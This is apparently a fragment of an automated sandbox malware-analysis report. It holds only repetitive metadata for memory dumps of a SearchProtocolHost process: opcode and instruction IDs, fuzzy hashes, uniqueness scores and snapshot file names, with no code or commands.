                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd84c2fd4c247f8f006d12875b967dc138e14d2fc183156c5ccc407704c28394
                                                                                      • Instruction ID: 5ce0383a645f94831f692666230094aaef4f83f3bb57491a5156ff2f32546f0f
                                                                                      • Opcode Fuzzy Hash: cd84c2fd4c247f8f006d12875b967dc138e14d2fc183156c5ccc407704c28394
                                                                                      • Instruction Fuzzy Hash: 1411E5F2600784AFEF21DF6BE844F56B7A8EB84B64F444216F814CB640C370E802CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e4b3f6f30dde1cc16b024f38fabe7ee65d1e7854ab897d9e75b8761d5c470d1
                                                                                      • Instruction ID: e433e6c6d5e7470da7ee82710105ff06c9b7f0b1451f2a8be3e6925447bd5723
                                                                                      • Opcode Fuzzy Hash: 6e4b3f6f30dde1cc16b024f38fabe7ee65d1e7854ab897d9e75b8761d5c470d1
                                                                                      • Instruction Fuzzy Hash: 5911E576A00754ABDB21EF58E9C0B5EF7B9EF88700F28005DD901AB245D730EE018BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d1a92b61cd8d28dfbaaee206516284c5664f828b4946346c73c54957677463c
                                                                                      • Instruction ID: ddf83f1caa36b1927683e54b0ff4523611e4108b44037ea86d2bf068d87f1306
                                                                                      • Opcode Fuzzy Hash: 4d1a92b61cd8d28dfbaaee206516284c5664f828b4946346c73c54957677463c
                                                                                      • Instruction Fuzzy Hash: 220126761502419BC726CF7F8A2C961FBE8FB9D31870C05ADE448C3B55D232E901C710
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fc5c1e8fbaa67256a262094b359e00e56ba2975c461bc2172e0287ebd9e3ce3
                                                                                      • Instruction ID: 50dbd1130436017b2122149058b2c3f78b777ecc4e33f04d40fa8c1f3a99f062
                                                                                      • Opcode Fuzzy Hash: 4fc5c1e8fbaa67256a262094b359e00e56ba2975c461bc2172e0287ebd9e3ce3
                                                                                      • Instruction Fuzzy Hash: BF018475A00318EBD710EBA9D849FAEB7B8EF84704F04446AF501EF280D674D901CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bebad6c657cfda43955fe542a6b432aa7c0b9917e76f3027542dd08c043001b2
                                                                                      • Instruction ID: 79566f3fa31d51e3713b3211aa47ebefc2a59ce367a83b953dadddda6aa1f85c
                                                                                      • Opcode Fuzzy Hash: bebad6c657cfda43955fe542a6b432aa7c0b9917e76f3027542dd08c043001b2
                                                                                      • Instruction Fuzzy Hash: DF116D78E10259EFCB04DFA9D444A9EB7B4EF48704F14849AB915EB381E634DA02CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction ID: 3e9b5cd7c6e822eabcd4f82f197bc8ea379be7758b0ba7266cb83963fb1f4d68
                                                                                      • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                      • Instruction Fuzzy Hash: D9F0FC372C06239BD333F7D94844B17F59E9FC5A60F190075E505BF690CA608C0196F4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 800710a873b5a210638a33d9a0cfa4af3738c586a86a49b3d78ee0845436ac52
                                                                                      • Instruction ID: 8227b05c105137e0ff2887267109b6a2db288f0c052e86b436b3b79aced7c8ad
                                                                                      • Opcode Fuzzy Hash: 800710a873b5a210638a33d9a0cfa4af3738c586a86a49b3d78ee0845436ac52
                                                                                      • Instruction Fuzzy Hash: A2111774A00249DFDB04DFA9D845BAEFBF4BF08304F1442AAE518EB382E634D941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction ID: c12b784847be4a4b73892067780b11c12667483cda378c46bdb65d1b37ec4378
                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                      • Instruction Fuzzy Hash: 3EF0FF72A11614AFE319CF5CC840F5AF7ECEB46B20F09406DE500EB220E672EE04CA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81a5bf94c2d64f3d5e86208815e9e080365fcf449fc438c91a9690ba74f05868
                                                                                      • Instruction ID: 8b812b02ddbe8acc0075ccd34567642968b016c790fee80fadb755c9adee6203
                                                                                      • Opcode Fuzzy Hash: 81a5bf94c2d64f3d5e86208815e9e080365fcf449fc438c91a9690ba74f05868
                                                                                      • Instruction Fuzzy Hash: A201E9B4E0070DAFDB14DFA9D545AAEB7F4AF48704F1084A9A955EB381E674DA00CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                      • Instruction ID: e96696c60553789b1020f664fb9db501f969df70f555a65a6846b75934807847
                                                                                      • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                      • Instruction Fuzzy Hash: 53F0FC75A153D46FEB18D7A68840FAEFBAC9FC5710F08459D9D01DB141DE30E941CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7eb2c9c9bc746afa181101cc39ad93a35526fae3d57951b64d85f48a0169660
                                                                                      • Instruction ID: d7a5d095a98b5169b7c988fd2dc03d76267b411768ca9c82656d8c623188b2da
                                                                                      • Opcode Fuzzy Hash: a7eb2c9c9bc746afa181101cc39ad93a35526fae3d57951b64d85f48a0169660
                                                                                      • Instruction Fuzzy Hash: 41019A3A101159ABCF129F84DC40EDA7F6AFB4C754F058141FE19A6220C236D970EB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67623487f30edd80246a0339389bb72fb5cdc26e2835a36244833c909c35cbca
                                                                                      • Instruction ID: d4a62131401700dddc362a17a2e20adad088606b392a67f66a922d0fedac2db4
                                                                                      • Opcode Fuzzy Hash: 67623487f30edd80246a0339389bb72fb5cdc26e2835a36244833c909c35cbca
                                                                                      • Instruction Fuzzy Hash: 70F02B3268434E5BF325F705DC14B23F28AE7C0791F28406AEF058F1D5DA71DC018265
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction ID: ffa790a50ace2743bab1e8af9c224fb13f68232927afcf14d32b7cca3e5220f1
                                                                                      • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction Fuzzy Hash: 8DF06276600748BFE711EBA4CD41FDAB7FCEB44714F044566B955EB190EAB0EA40CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2db14c0b86de1dd5ba2f06b80b14b26181eba4246c0035e72b28157b19e0b2f5
                                                                                      • Instruction ID: f22385bdb1ee5d06e6982735e2d96096337ad384dbecf1a9d71a37d853d2dbd1
                                                                                      • Opcode Fuzzy Hash: 2db14c0b86de1dd5ba2f06b80b14b26181eba4246c0035e72b28157b19e0b2f5
                                                                                      • Instruction Fuzzy Hash: EFF0A4742057049FC314EF68C445A1AB7F4FF88B04F404A5AB898DF395E634E900C756
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction ID: 8bd95110dc76e55f42e2fb65f664ea8105270c26a76745800d912a35134bb6bc
                                                                                      • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                      • Instruction Fuzzy Hash: 41E0CD35494610FFD731FF14DC04F5176B5FF44710F14055DF1860A0608FB49881DA49
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction ID: 323cbc564a2327e34fa6dfc4f1a27958a0fe80d288da323e51844c7268c27738
                                                                                      • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction Fuzzy Hash: A9D05E36092B50AAD732BF14ED09F92BAB6AF80B11F190528B1051A8F0C6A1ED85CA90
